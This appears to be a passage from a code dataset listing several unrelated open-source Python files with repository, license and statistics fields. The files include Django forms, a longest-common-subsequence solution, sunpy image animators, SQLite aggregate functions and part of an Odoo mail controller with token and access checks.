def __init__(self, *args, **kwargs):
super(ScriptSelectFormField, self).__init__(*args, **kwargs)
self.widget = forms.SelectMultiple(choices=utils.script_choices())
class FuzzyDateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
attrs={
'class':'input-small',
'placeholder': 'Start Date'
}
super(FuzzyDateForm, self).__init__(*args, **kwargs)
self.fields["start_date"].widget = widgets.AdminDateWidget(attrs=attrs)
self.fields["end_date"].widget = widgets.AdminDateWidget(attrs=attrs)
class Meta:
model = models.FuzzyDate
fields = ("start_date", "end_date",)
class OtherNameForm(forms.ModelForm):
class Meta:
fields = ("name",)
widgets = {
"name": forms.TextInput(attrs={'placeholder': _("Type another name here...")}),
}
class PortalEntityForm(forms.ModelForm):
# extra (non-model) field for revision comment
revision_comment = forms.CharField(required=False, widget=forms.TextInput(attrs={
"placeholder": _("Summary of changes (optional)"),
}))
class ContactForm(forms.ModelForm):
class Meta:
model = models.Contact
class CollectionEditForm(PortalEntityForm):
languages = LanguageSelectFormField()
languages_of_description = LanguageSelectFormField()
scripts = ScriptSelectFormField()
scripts_of_description = ScriptSelectFormField()
class Meta:
model = models.Collection
class RepositoryEditForm(PortalEntityForm):
languages = LanguageSelectFormField()
scripts = ScriptSelectFormField()
class Meta:
model = models.Repository
class AuthorityEditForm(PortalEntityForm):
languages = LanguageSelectFormField()
scripts = ScriptSelectFormField()
class Meta:
model = models.Authority
class RestoreRevisionForm(forms.Form):
"""Restore a revision of an object."""
def propertyformset_factory(topclass, propname):
propcls = models.propertyproxy_factory(propname)
return inlineformset_factory(
topclass, propcls, fields=("value",), extra=1)
# FIXME: !!! The OtherName formsets below are created using the Collection
# as the primary model, but they're also used in the repository and
# authority forms. This doesn't seem to matter, because when they're
# constructed the primary model seems to be overridden by the instance
# argument given, but it's obviously still wrong and bug-prone.
# The alternative is lots of ugly duplication or another exceedingly
# meta 'factory' function, neither of which are nice options.
DateFormSet = inlineformset_factory(models.Collection, models.FuzzyDate,
form=FuzzyDateForm, extra=1)
OtherNameFormSet = inlineformset_factory(models.Collection, models.OtherFormOfName,
form=OtherNameForm, extra=1)
ParallelNameFormSet = inlineformset_factory(models.Collection, models.ParallelFormOfName,
form=OtherNameForm, extra=1)
ContactFormSet = inlineformset_factory(models.Repository, models.Contact,
form=ContactForm, extra=1)
|
mit
| -8,758,907,469,438,605,000
| 32.612022
| 95
| 0.679402
| false
| 4.128188
| false
| false
| false
|
franklingu/leetcode-solutions
|
questions/longest-common-subsequence/Solution.py
|
1
|
1711
|
"""
Given two strings text1 and text2, return the length of their longest common subsequence.
A subsequence of a string is a new string generated from the original string with some characters (can be none) deleted without changing the relative order of the remaining characters. (eg, "ace" is a subsequence of "abcde" while "aec" is not). A common subsequence of two strings is a subsequence that is common to both strings.
If there is no common subsequence, return 0.
Example 1:
Input: text1 = "abcde", text2 = "ace"
Output: 3
Explanation: The longest common subsequence is "ace" and its length is 3.
Example 2:
Input: text1 = "abc", text2 = "abc"
Output: 3
Explanation: The longest common subsequence is "abc" and its length is 3.
Example 3:
Input: text1 = "abc", text2 = "def"
Output: 0
Explanation: There is no such common subsequence, so the result is 0.
Constraints:
1 <= text1.length <= 1000
1 <= text2.length <= 1000
The input strings consist of lowercase English characters only.
"""
class Solution:
def longestCommonSubsequence(self, text1: str, text2: str) -> int:
if not text1 or not text2:
return 0
dp = [[0] * len(text2) for _ in text1]
for i, c1 in enumerate(text1):
for j, c2 in enumerate(text2):
if c1 == c2:
dp[i][j] = 1 if i < 1 or j < 1 else dp[i - 1][j - 1] + 1
continue
if i < 1:
n1 = 0
else:
n1 = dp[i - 1][j]
if j < 1:
n2 = 0
else:
n2 = dp[i][j - 1]
dp[i][j] = max(n1, n2)
return dp[-1][-1]
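# Usage sketch (not part of the original solution). The DP table has
# len(text1) * len(text2) cells, so time and space are both O(m * n):
#
#   Solution().longestCommonSubsequence("abcde", "ace")  # -> 3
#   Solution().longestCommonSubsequence("abc", "def")    # -> 0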
|
mit
| -3,796,396,246,717,548,000
| 29.553571
| 328
| 0.5827
| false
| 3.572025
| false
| false
| false
|
iwinulose/eve
|
eve/objects.py
|
1
|
2549
|
# Copyright (c) 2014, Charles Duyk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class Entity(object):
def __init__(self, name, theId):
self._name = name
self._id = int(theId)
def __repr__(self):
return "%s(\"%s\", %d)" % (self.__class__.__name__, self.getName(), self.getID())
def __str__(self):
return "%s (id: %d)" % (self.getName(), self.getID())
def __eq__(self, other):
if isinstance(other, Entity):
return self.getID() == other.getID()
return NotImplemented
def __ne__(self, other):
isEqual = self.__eq__(other)
if isEqual is NotImplemented:
return isEqual
return not isEqual
def getName(self):
return self._name
def getID(self):
return self._id
def valueByVolume(self, pricePerUnit, volume=1.0):
volumeFloat = volume + 0.0
unitVolume = self.getSize()
pricePerMeter = pricePerUnit/unitVolume
value = pricePerMeter * volumeFloat
return value
class Item(Entity):
def __init__(self, name, marketID, size):
super(Item, self).__init__(name, marketID)
self._size = size + 0.0
def __repr__(self):
return "Item(\"%s\", %d, %f)" % (self.getName(), self.getID(), self.getSize())
def __str__(self):
return "%s: id %d size %f" % (self.getName(), self.getID(), self.getSize())
def getSize(self):
return self._size
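# Illustrative sketch (hypothetical values, not part of the original file):
# valueByVolume() turns a per-unit price into a price per cubic metre of
# the item's size, then scales it to the requested volume.
#
#   tritanium = Item("Tritanium", 34, 0.01)   # 0.01 m3 per unit
#   tritanium.valueByVolume(5.0, volume=2.0)  # (5.0 / 0.01) * 2.0 -> 1000.0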
|
bsd-2-clause
| -414,263,850,727,675,300
| 31.679487
| 83
| 0.708905
| false
| 3.641429
| false
| false
| false
|
apache/bloodhound
|
bloodhound_dashboard/bhdashboard/wiki.py
|
2
|
3618
|
# -*- coding: UTF-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
r"""Project dashboard for Apache(TM) Bloodhound
WikiMacros and WikiProcessors related to dashboard system.
"""
from ast import literal_eval
from genshi.builder import tag
from trac.web.chrome import Chrome
from trac.wiki.api import parse_args
from trac.wiki.macros import WikiMacroBase
from bhdashboard.web_ui import DashboardChrome, DashboardModule
GUIDE_NAME = 'Guide'
RENAME_MAP = {'TracGuide': GUIDE_NAME + '/Index',}
def new_name(name, force=False):
if name.startswith('Trac'):
return RENAME_MAP.get(name, GUIDE_NAME + '/' + name[4:])
else:
return name
class WidgetMacro(WikiMacroBase):
"""Embed Bloodhound widgets using WikiFormatting.
"""
#: A gettext domain to translate the macro description
_domain = None
#: A macro description
_description = """Embed Bloodhound widgets using WikiFormatting."""
def expand_macro(self, formatter, name, content):
"""Render widget contents by re-using wiki markup implementation
"""
if self.env[DashboardModule] is None:
return DashboardModule(self.env).alert_disabled()
largs, kwargs = parse_args(content, strict=True)
try:
(widget_name ,) = largs
except ValueError:
template = 'widget_alert.html'
data = {
'msgtype' : 'error',
'msglabel' : 'Error',
'msgbody' : tag('Expected ', tag.code(1),
' positional argument (i.e. widget name), but got ',
tag.code(len(largs)), ' instead'),
'msgdetails' : [
('Macro name', tag.code('WidgetMacro')),
('Arguments', ', '.join(largs) if largs \
else tag.span('None', class_='label')),
],
}
else:
widget_name = widget_name.strip()
wopts = {} ; wargs = {}
def parse_literal(value):
try:
return literal_eval(value)
except (SyntaxError, ValueError):
return value
for argnm, value in kwargs.iteritems():
if argnm.startswith('wo_'):
wopts[argnm[3:]] = value
else :
wargs[argnm] = parse_literal(value)
template = 'widget.html'
data = {
'args' : wargs,
'bhdb' : DashboardChrome(self.env),
'id' : None,
'opts' : wopts,
'widget' : widget_name
}
return Chrome(self.env).render_template(
formatter.req, template, data, fragment=True)
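# Illustrative usage sketch (hypothetical widget and arguments, not part of
# the original module): in wiki markup the single positional argument names
# the widget, `wo_`-prefixed keywords become widget options, and the rest
# are literal-evaluated and passed through as template arguments, e.g.:
#
#   [[WidgetMacro(TicketFieldValues, wo_field=status, max=10)]]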
|
apache-2.0
| 3,236,449,236,041,884,000
| 35.18
| 80
| 0.572692
| false
| 4.231579
| false
| false
| false
|
bskari/sparkfun-avc
|
analysis/process_gps.py
|
1
|
1997
|
"""Formats GPS log messages into a path KMZ file that Google Earth can read."""
#!/bin/env python
import collections
import json
import sys
from plot_points import get_kml
def main():
"""Main function."""
if len(sys.argv) <= 1:
print('Usage: {} <log file>'.format(sys.argv[0]))
return
in_file_name = sys.argv[1]
name = in_file_name[:in_file_name.rfind('.')]
out_file_name = sys.argv[2] if len(sys.argv) > 2 else 'out.kml'
with open(in_file_name) as in_stream:
lines = in_stream.readlines()
runs = process_lines(iter(lines))
with open(out_file_name, 'w') as out_stream:
out_stream.write(get_kml(runs, name))
def process_lines(in_stream):
"""I don't know."""
run_count = 1
runs = []
for line in in_stream:
if 'Received run command' in line or 'Button pressed' in line:
print('Starting run {}'.format(run_count))
runs.append(process_run(in_stream, run_count))
run_count += 1
return runs
def process_run(in_stream, run_count):
"""Returns the points in a run."""
points = collections.defaultdict(lambda: [])
for line in in_stream:
if 'Received stop command' in line or 'No waypoints, stopping' in line:
break
elif '"device_id"' in line:
parts = json.loads(line[line.find('{'):line.rfind('}') + 1])
if 'latitude_d' not in parts:
# Probably an accelerometer message
continue
latitude = parts['latitude_d']
longitude = parts['longitude_d']
# Ignore early bad estimates
if latitude > 1:
points[parts['device_id']].append((latitude, longitude))
else:
print('Ignoring {},{}'.format(latitude, longitude))
print(
'Ending run {} with {} paths'.format(
run_count,
len(points)
)
)
return points
if __name__ == '__main__':
main()
|
mit
| -5,713,281,913,200,312,000
| 28.367647
| 79
| 0.564347
| false
| 3.767925
| false
| false
| false
|
magfest/ubersystem
|
alembic/versions/e74a6a5904cd_add_payment_method_to_receipt_items.py
|
1
|
1766
|
"""Add payment_method to receipt items
Revision ID: e74a6a5904cd
Revises: 53b71e7c45b5
Create Date: 2019-12-20 19:00:34.631484
"""
# revision identifiers, used by Alembic.
revision = 'e74a6a5904cd'
down_revision = '53b71e7c45b5'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('receipt_item', sa.Column('payment_method', sa.Integer(), server_default='180350097', nullable=False))
def downgrade():
op.drop_column('receipt_item', 'payment_method')
|
agpl-3.0
| -5,071,260,178,703,831,000
| 28.932203
| 120
| 0.627973
| false
| 3.503968
| false
| false
| false
|
dpshelio/sunpy
|
sunpy/visualization/animator/image.py
|
2
|
9327
|
import matplotlib as mpl
import astropy.wcs
from sunpy.visualization.animator.base import ArrayAnimator
__all__ = ['ImageAnimator', 'ImageAnimatorWCS']
class ImageAnimator(ArrayAnimator):
"""
Create a matplotlib backend independent data explorer for 2D images.
The following keyboard shortcuts are defined in the viewer:
* 'left': previous step on active slider.
* 'right': next step on active slider.
* 'top': change the active slider up one.
* 'bottom': change the active slider down one.
* 'p': play/pause active slider.
This viewer can have user defined buttons added by specifying the labels
and functions called when those buttons are clicked as keyword arguments.
Parameters
----------
data: `numpy.ndarray`
The data to be visualized.
image_axes: `list`, optional
A list of the axes order that make up the image.
axis_ranges: `list` of physical coordinates for the `numpy.ndarray`, optional
Defaults to `None` and array indices will be used for all axes.
The `list` should contain one element for each axis of the `numpy.ndarray`.
For the image axes a ``[min, max]`` pair should be specified which will be
passed to `matplotlib.pyplot.imshow` as an extent.
For the slider axes a ``[min, max]`` pair can be specified or an array the
same length as the axis which will provide all values for that slider.
Notes
-----
Extra keywords are passed to `~sunpy.visualization.animator.ArrayAnimator`.
"""
def __init__(self, data, image_axes=[-2, -1], axis_ranges=None, **kwargs):
# Check that number of axes is 2.
if len(image_axes) != 2:
raise ValueError("There can only be two spatial axes")
# Define number of slider axes.
self.naxis = data.ndim
self.num_sliders = self.naxis-2
# Define marker to determine if plot axes values are supplied via array of
# pixel values or min max pair. This will determine the type of image produced
# and hence how to plot and update it.
self._non_regular_plot_axis = False
# Run init for parent class
super().__init__(data, image_axes=image_axes, axis_ranges=axis_ranges, **kwargs)
def plot_start_image(self, ax):
"""
Sets up plot of initial image.
"""
# Create extent arg
extent = []
# reverse because numpy is in y-x and extent is x-y
if max([len(self.axis_ranges[i]) for i in self.image_axes[::-1]]) > 2:
self._non_regular_plot_axis = True
for i in self.image_axes[::-1]:
if self._non_regular_plot_axis is False and len(self.axis_ranges[i]) > 2:
self._non_regular_plot_axis = True
extent.append(self.axis_ranges[i][0])
extent.append(self.axis_ranges[i][-1])
imshow_args = {'interpolation': 'nearest',
'origin': 'lower'}
imshow_args.update(self.imshow_kwargs)
# If value along an axis is set with an array, generate a NonUniformImage
if self._non_regular_plot_axis:
# If user has inverted the axes, transpose the data so the dimensions match.
if self.image_axes[0] < self.image_axes[1]:
data = self.data[self.frame_index].transpose()
else:
data = self.data[self.frame_index]
# Initialize a NonUniformImage with the relevant data and axis values and
# add the image to the axes.
im = mpl.image.NonUniformImage(ax, **imshow_args)
im.set_data(self.axis_ranges[self.image_axes[0]], self.axis_ranges[self.image_axes[1]], data)
ax.add_image(im)
# Define the xlim and ylim from the pixel edges.
ax.set_xlim(self.extent[0], self.extent[1])
ax.set_ylim(self.extent[2], self.extent[3])
else:
# Else produce a more basic plot with regular axes.
imshow_args.update({'extent': extent})
im = ax.imshow(self.data[self.frame_index], **imshow_args)
if self.if_colorbar:
self._add_colorbar(im)
return im
def update_plot(self, val, im, slider):
"""
Updates plot based on slider/array dimension being iterated.
"""
ind = int(val)
ax_ind = self.slider_axes[slider.slider_ind]
self.frame_slice[ax_ind] = ind
if val != slider.cval:
if self._non_regular_plot_axis:
if self.image_axes[0] < self.image_axes[1]:
data = self.data[self.frame_index].transpose()
else:
data = self.data[self.frame_index]
im.set_data(self.axis_ranges[self.image_axes[0]],
self.axis_ranges[self.image_axes[1]], data)
else:
im.set_array(self.data[self.frame_index])
slider.cval = val
# Update slider label to reflect real world values in axis_ranges.
super().update_plot(val, im, slider)
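# A minimal usage sketch (illustrative, not part of the original module):
# animate a stack of ten 50x50 images, with one slider for the leading axis.
#
#   import numpy as np
#   import matplotlib.pyplot as plt
#   anim = ImageAnimator(np.random.rand(10, 50, 50))
#   plt.show()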
class ImageAnimatorWCS(ImageAnimator):
"""
Animates N-dimensional data with the associated `astropy.wcs.WCS`
information.
The following keyboard shortcuts are defined in the viewer:
* 'left': previous step on active slider.
* 'right': next step on active slider.
* 'top': change the active slider up one.
* 'bottom': change the active slider down one.
* 'p': play/pause active slider.
This viewer can have user defined buttons added by specifying the labels
and functions called when those buttons are clicked as keyword arguments.
Parameters
----------
data: `numpy.ndarray`
The data to be visualized.
image_axes: `list`, optional
A list of the axes order that make up the image.
unit_x_axis: `astropy.units.Unit`
The unit of X axis.
unit_y_axis: `astropy.units.Unit`
The unit of Y axis.
axis_ranges: `list` of physical coordinates for the `numpy.ndarray`, optional
Defaults to `None` and array indices will be used for all axes.
The `list` should contain one element for each axis of the `numpy.ndarray`.
For the image axes a ``[min, max]`` pair should be specified which will be
passed to `matplotlib.pyplot.imshow` as an extent.
For the slider axes a ``[min, max]`` pair can be specified or an array the
same length as the axis which will provide all values for that slider.
Notes
-----
Extra keywords are passed to `~sunpy.visualization.animator.ArrayAnimator`.
"""
def __init__(self, data, wcs=None, image_axes=[-1, -2], unit_x_axis=None, unit_y_axis=None,
axis_ranges=None, **kwargs):
if not isinstance(wcs, astropy.wcs.WCS):
raise ValueError("wcs data should be provided.")
        if wcs.wcs.naxis != data.ndim:
raise ValueError("Dimensions of data and wcs not matching")
self.wcs = wcs
list_slices_wcsaxes = [0 for i in range(self.wcs.naxis)]
list_slices_wcsaxes[image_axes[0]] = 'x'
list_slices_wcsaxes[image_axes[1]] = 'y'
self.slices_wcsaxes = list_slices_wcsaxes[::-1]
self.unit_x_axis = unit_x_axis
self.unit_y_axis = unit_y_axis
super().__init__(data, image_axes=image_axes, axis_ranges=axis_ranges, **kwargs)
def _get_main_axes(self):
axes = self.fig.add_axes([0.1, 0.1, 0.8, 0.8], projection=self.wcs,
slices=self.slices_wcsaxes)
self._set_unit_in_axis(axes)
return axes
def _set_unit_in_axis(self, axes):
x_index = self.slices_wcsaxes.index("x")
y_index = self.slices_wcsaxes.index("y")
if self.unit_x_axis is not None:
axes.coords[x_index].set_format_unit(self.unit_x_axis)
axes.coords[x_index].set_ticks(exclude_overlapping=True)
if self.unit_y_axis is not None:
axes.coords[y_index].set_format_unit(self.unit_y_axis)
axes.coords[y_index].set_ticks(exclude_overlapping=True)
def plot_start_image(self, ax):
"""
Sets up a plot of initial image.
"""
imshow_args = {'interpolation': 'nearest',
'origin': 'lower',
}
imshow_args.update(self.imshow_kwargs)
im = ax.imshow(self.data[self.frame_index], **imshow_args)
if self.if_colorbar:
self._add_colorbar(im)
return im
def update_plot(self, val, im, slider):
"""
Updates plot based on slider/array dimension being iterated.
"""
ind = int(val)
ax_ind = self.slider_axes[slider.slider_ind]
self.frame_slice[ax_ind] = ind
list_slices_wcsaxes = list(self.slices_wcsaxes)
list_slices_wcsaxes[self.wcs.naxis-ax_ind-1] = val
self.slices_wcsaxes = list_slices_wcsaxes
if val != slider.cval:
self.axes.reset_wcs(wcs=self.wcs, slices=self.slices_wcsaxes)
self._set_unit_in_axis(self.axes)
im.set_array(self.data[self.frame_index])
slider.cval = val
# Update slider label to reflect real world values in axis_ranges.
super().update_plot(val, im, slider)
|
bsd-2-clause
| -2,824,382,928,485,726,700
| 41.395455
| 105
| 0.609199
| false
| 3.833539
| false
| false
| false
|
rbianchi66/survey
|
src/radioquestion.py
|
1
|
2777
|
from PyQt4 import QtGui, Qt, QtCore
from question import Question
class RadioQuestion(Question):
def __init__(self, id, question, card, parent = None):
self.buttons = []
super(RadioQuestion, self).__init__(id, question, card, parent)
def updateValue(self, question, answer):
self.card.set(question, answer)
self.emit( Qt.SIGNAL("clicked()"))
def showButtons(self, q):
qind = 0
if len(q) > 5:
hlay = QtGui.QHBoxLayout()
ncols = len(q) / 5
for nc in xrange(ncols):
qlay = QtGui.QVBoxLayout()
for icol in xrange(5):
element = QtGui.QRadioButton(self)
self.buttons.append(element)
n, question, valore = q[qind]
                    # bind loop variables as defaults so each button keeps its own question
                    self.connect(element, Qt.SIGNAL("clicked()"), lambda n=n, question=question: self.updateValue(question, n))
if self.card.get(question) == n:
element.setChecked(True)
element.setText(valore)
qlay.addWidget(element)
qind += 1
hlay.addLayout(qlay)
if len(q)%5 > 0:
qlay = QtGui.QVBoxLayout()
for icol in xrange(len(q)%5):
element = QtGui.QRadioButton(self)
self.buttons.append(element)
n, question, val = q[qind]
                    self.connect(element, Qt.SIGNAL("clicked()"), lambda n=n, question=question: self.updateValue(question, n))
if self.card.get(question) == n:
element.setChecked(True)
element.setText(val)
qlay.addWidget(element)
qind += 1
hlay.addLayout(qlay)
self.answers_layout.addLayout(hlay)
else:
for icol in xrange(len(q)):
element = QtGui.QRadioButton(self)
self.buttons.append(element)
n, question, val = q[qind]
                self.connect(element, Qt.SIGNAL("clicked()"), lambda n=n, question=question: self.updateValue(question, n))
if self.card.get(question) == n:
element.setChecked(True)
element.setText(val)
self.answers_layout.addWidget(element)
qind += 1
if len(self.buttons):
bf = None
for b in self.buttons:
if b.isChecked() == True:
bf = b
if bf is None:
answer, question, valore = q[0]
self.updateValue(question, answer)
self.buttons[0].setChecked(True)
|
gpl-2.0
| 6,312,017,638,981,724,000
| 40.723077
| 111
| 0.476413
| false
| 4.479032
| false
| false
| false
|
wlieurance/aim-reporting
|
classes.py
|
1
|
2503
|
import numpy
### sample standard deviation
class stdevs:
def __init__(self):
self.list = []
self.x = 0
def step(self, value):
if value != None:
self.list.append(value)
def finalize(self):
#print(self.list)
if len(self.list) > 1:
self.x = numpy.std(self.list, ddof=1)
else:
self.x = None
return self.x
### population standard deviation
class stdevp:
def __init__(self):
self.list = []
self.x = 0
def step(self, value):
if value != None:
self.list.append(value)
def finalize(self):
#print(self.list)
if len(self.list) > 1:
self.x = numpy.std(self.list, ddof=0)
else:
self.x = None
return self.x
### weighted mean
class meanw:
def __init__(self):
self.wgtlist = []
self.list = []
self.x = 0
def step(self, value, wgt):
if wgt == None:
wgt = 1
if value != None:
self.list.append(value)
self.wgtlist.append(wgt)
def finalize(self):
#print(self.list)
if len(self.list) >= 1:
y = numpy.array(self.list)
w = numpy.array(self.wgtlist)
self.x = (numpy.sum(w*y))/(numpy.sum(w))
else:
self.x = None
return self.x
### weighted standard deviation
class stdevw:
def __init__(self):
self.wgtlist = []
self.list = []
self.x = 0
def step(self, value, wgt):
if wgt == None:
wgt = 1
if value != None:
self.list.append(value)
self.wgtlist.append(wgt)
def finalize(self):
#print(self.list)
if len(self.list) > 1:
#unbiased estimator of variance with sample weights
#https://www.gnu.org/software/gsl/manual/html_node/Weighted-Samples.html
#https://en.wikipedia.org/wiki/Weighted_arithmetic_mean ###Reliability weights
y = numpy.array(self.list)
w = numpy.array(self.wgtlist)
V1 = numpy.sum(w)
V2 = numpy.sum(w**2)
mu = (numpy.sum(w*y)/V1) #weighted mean
muArray = numpy.full(y.size, mu)
sigma2w = numpy.sum(w*((y-muArray)**2))
self.x = (sigma2w/(V1-(V2/V1)))**(0.5)
#print("mu:",mu,"V1:",V1,"V2:",V2,"sigma2w:", sigma2w,"x:", self.x)
else:
self.x = None
return self.x
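# Illustrative check (not part of the original module): the aggregates are
# meant to mirror numpy, e.g. stdevs should agree with numpy.std(..., ddof=1):
#
#   agg = stdevs()
#   for v in (1.0, 2.0, 4.0):
#       agg.step(v)
#   agg.finalize()                      # -> 1.5275...
#   numpy.std([1.0, 2.0, 4.0], ddof=1)  # -> same value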
|
gpl-3.0
| 3,504,032,938,813,552,000
| 28.104651
| 92
| 0.503396
| false
| 3.387009
| false
| false
| false
|
ddico/odoo
|
addons/mail/controllers/main.py
|
1
|
14644
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import base64
import logging
import psycopg2
import werkzeug.utils
import werkzeug.wrappers
from werkzeug.urls import url_encode
from odoo import api, http, registry, SUPERUSER_ID, _
from odoo.exceptions import AccessError
from odoo.http import request
from odoo.tools import consteq
_logger = logging.getLogger(__name__)
class MailController(http.Controller):
_cp_path = '/mail'
@classmethod
def _redirect_to_messaging(cls):
url = '/web#%s' % url_encode({'action': 'mail.action_discuss'})
return werkzeug.utils.redirect(url)
@classmethod
def _check_token(cls, token):
base_link = request.httprequest.path
params = dict(request.params)
params.pop('token', '')
valid_token = request.env['mail.thread']._notify_encode_link(base_link, params)
return consteq(valid_token, str(token))
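    # Usage sketch (assumption, illustrative values only): a link that passes
    # _check_token() is built with the same helper the check uses, e.g.
    #   params = {'model': 'res.partner', 'res_id': 42}
    #   token = request.env['mail.thread']._notify_encode_link('/mail/assign', params)
    #   url = '/mail/assign?%s' % url_encode(dict(params, token=token))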
@classmethod
def _check_token_and_record_or_redirect(cls, model, res_id, token):
comparison = cls._check_token(token)
if not comparison:
_logger.warning(_('Invalid token in route %s', request.httprequest.url))
return comparison, None, cls._redirect_to_messaging()
try:
record = request.env[model].browse(res_id).exists()
except Exception:
record = None
redirect = cls._redirect_to_messaging()
else:
redirect = cls._redirect_to_record(model, res_id)
return comparison, record, redirect
@classmethod
def _redirect_to_record(cls, model, res_id, access_token=None, **kwargs):
        # access_token and kwargs are used in the portal controller override for the
        # "Send by email" and "Share Link" features, to give access to the record to a
        # recipient that normally has no access.
uid = request.session.uid
user = request.env['res.users'].sudo().browse(uid)
cids = False
# no model / res_id, meaning no possible record -> redirect to login
if not model or not res_id or model not in request.env:
return cls._redirect_to_messaging()
# find the access action using sudo to have the details about the access link
RecordModel = request.env[model]
record_sudo = RecordModel.sudo().browse(res_id).exists()
if not record_sudo:
# record does not seem to exist -> redirect to login
return cls._redirect_to_messaging()
# the record has a window redirection: check access rights
if uid is not None:
if not RecordModel.with_user(uid).check_access_rights('read', raise_exception=False):
return cls._redirect_to_messaging()
try:
# We need here to extend the "allowed_company_ids" to allow a redirection
# to any record that the user can access, regardless of currently visible
# records based on the "currently allowed companies".
cids = request.httprequest.cookies.get('cids', str(user.company_id.id))
cids = [int(cid) for cid in cids.split(',')]
try:
record_sudo.with_user(uid).with_context(allowed_company_ids=cids).check_access_rule('read')
except AccessError:
# In case the allowed_company_ids from the cookies (i.e. the last user configuration
                # on his browser) is not sufficient to avoid an ir.rule access error, try the following
# heuristic:
# - Guess the supposed necessary company to access the record via the method
# _get_mail_redirect_suggested_company
# - If no company, then redirect to the messaging
# - Merge the suggested company with the companies on the cookie
                # - Make a new access test; if it succeeds, redirect to the record. Otherwise,
# redirect to the messaging.
suggested_company = record_sudo._get_mail_redirect_suggested_company()
if not suggested_company:
raise AccessError('')
cids = cids + [suggested_company.id]
record_sudo.with_user(uid).with_context(allowed_company_ids=cids).check_access_rule('read')
except AccessError:
return cls._redirect_to_messaging()
else:
record_action = record_sudo.get_access_action(access_uid=uid)
else:
record_action = record_sudo.get_access_action()
if record_action['type'] == 'ir.actions.act_url' and record_action.get('target_type') != 'public':
return cls._redirect_to_messaging()
record_action.pop('target_type', None)
# the record has an URL redirection: use it directly
if record_action['type'] == 'ir.actions.act_url':
return werkzeug.utils.redirect(record_action['url'])
# other choice: act_window (no support of anything else currently)
elif not record_action['type'] == 'ir.actions.act_window':
return cls._redirect_to_messaging()
url_params = {
'model': model,
'id': res_id,
'active_id': res_id,
'action': record_action.get('id'),
}
view_id = record_sudo.get_formview_id()
if view_id:
url_params['view_id'] = view_id
if cids:
url_params['cids'] = ','.join([str(cid) for cid in cids])
url = '/web?#%s' % url_encode(url_params)
return werkzeug.utils.redirect(url)
@http.route('/mail/read_followers', type='json', auth='user')
def read_followers(self, follower_ids):
request.env['mail.followers'].check_access_rights("read")
follower_recs = request.env['mail.followers'].sudo().browse(follower_ids)
res_ids = follower_recs.mapped('res_id')
res_models = set(follower_recs.mapped('res_model'))
if len(res_models) > 1:
raise AccessError(_("Can't read followers with different targeted model"))
res_model = res_models.pop()
request.env[res_model].check_access_rights("read")
request.env[res_model].browse(res_ids).check_access_rule("read")
followers = []
follower_id = None
for follower in follower_recs:
if follower.partner_id == request.env.user.partner_id:
follower_id = follower.id
followers.append({
'id': follower.id,
'partner_id': follower.partner_id.id,
'channel_id': follower.channel_id.id,
'name': follower.name,
'email': follower.email,
'is_active': follower.is_active,
                # When editing the followers, the "pencil" icon that leads to the editing
                # of subtypes should always be displayed, not only when "debug" mode is activated.
'is_editable': True
})
return {
'followers': followers,
'subtypes': self.read_subscription_data(follower_id) if follower_id else None
}
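    # Usage sketch (assumption, illustrative only): the web client calls this
    # route as a JSON-RPC request, wrapped in the usual Odoo envelope, e.g.
    #   POST /mail/read_followers   with params {"follower_ids": [1, 2]}
    # and receives {'followers': [...], 'subtypes': [...] or None}.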
@http.route('/mail/read_subscription_data', type='json', auth='user')
def read_subscription_data(self, follower_id):
""" Computes:
- message_subtype_data: data about document subtypes: which are
available, which are followed if any """
request.env['mail.followers'].check_access_rights("read")
follower = request.env['mail.followers'].sudo().browse(follower_id)
follower.ensure_one()
request.env[follower.res_model].check_access_rights("read")
